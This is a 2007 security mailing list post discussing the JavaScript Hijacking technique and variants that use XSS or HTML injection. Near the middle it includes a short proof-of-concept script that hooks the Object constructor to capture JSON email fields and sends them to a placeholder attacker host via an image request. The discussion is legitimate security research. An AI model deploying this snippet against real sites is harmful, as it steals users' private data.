Secure Coding mailing list archives

JavaScript Hijacking

From: stefano.dipaola at wisec.it (Stefano Di Paola)
Date: Tue, 03 Apr 2007 18:30:11 +0200

Hi Brian,
Il giorno lun, 02/04/2007 alle 12.13 -0700, Brian Chess ha scritto:

Hi Stefano,

Yes, we are aware of your paper, but we intentionally chose to omit the
reference because we are quite snobby.  I'm joking!


:DD lol

The difference between what you discuss and JavaScript Hijacking is that we
do not assume the presence of another defect.  JavaScript Hijacking does not
require the existence of a cross-site scripting vulnerability or the like.
It's a new attack technique (and a new vulnerable code pattern), not a new
method for exploiting an existing class of vulnerabilities.


Ok I see the difference. 
You are taking advantage of a pure json CSRF with a evil script which
contains a modified version of the Object prototype.
And when the callback function is executed you use a XMLHttpRequest in
order to send the information extracted by the instantiated object.

Well i can see that you don't require a XSS vuln on a host, but you
assume a vulnerability on a user who has to click on a link :)

Anyway, if there's a html injection on a 3rd site you could use an
iframe with an evil page like the one you described without waiting  for
a user to click on an untrusted link.

Or, if you cant use iframes, as XMLHttpRequest is restricted by same
origin policy, you dont need an evil page since you could use a XSS
vulnerable site as a vector in order to steal json informations with an
img tag.
--
<script>
function Object(){
 this.email setter =  captureObject;
}
function captureObject(x){
(new Image()).src='http:// evil. com/ collect?email='+x;
}
</script>
<script src='http:// vuln /json.js' ></script>
--

But this is just another way to accomplish your attack.

BTW very nice paper!

Regards,
Stefano

Thanks,
Brian


-- 
...oOOo...oOOo....
Stefano Di Paola
Software & Security Engineer

Web: www.wisec.it
..................
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Questa =?ISO-8859-1?Q?=E8?= una parte del messaggio
        firmata digitalmente
Url : http://krvw.com/pipermail/sc-l/attachments/20070403/706dee87/attachment.bin

Current thread:

JavaScript Hijacking Brian Chess (Apr 01)
- <Possible follow-ups>
- JavaScript Hijacking Stefano Di Paola (Apr 02)
  - JavaScript Hijacking Brian Chess (Apr 02)
    - JavaScript Hijacking Stefano Di Paola (Apr 03)
    - JavaScript Hijacking Frederik De Keukelaere (Apr 05)
    - Foundations of Security: What Every Programmer Needs to Know McGovern, James F (HTSC, IT) (Apr 04)
- JavaScript Hijacking Brian Chess (Apr 19)